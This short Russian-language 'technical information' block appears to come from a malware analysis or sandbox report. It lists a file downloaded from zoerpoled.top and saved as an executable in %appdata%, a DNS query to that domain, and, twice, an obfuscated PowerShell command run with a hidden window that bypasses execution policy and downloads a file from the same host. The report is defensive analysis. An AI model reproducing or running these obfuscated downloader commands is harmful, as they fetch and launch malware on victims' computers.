Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWerShELl.e^X^e^ -^EX^e^CUTi^O^NP^OLI^C^y by^PAss ^-^N^o^p^R^oFilE^ -wInDowsT^y^lE hIdD^E^N^ (N^ew-oBjeCt ^SYstEm.^Net.Web^c^lIEnt).Do^wn^L^OadfIlE('http://www.zoerpoled.top...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /C "POWerShELl.e^X^e^ -^EX^e^CUTi^O^NP^OLI^C^y by^PAss ^-^N^o^p^R^oFilE^ -wInDowsT^y^lE hIdD^E^N^ (N^ew-oBjeCt ^SYstEm.^Net.Web^c^lIEnt).Do^wn^L^OadfIlE('http://www.zoerpoled.top...' (со скрытым окном)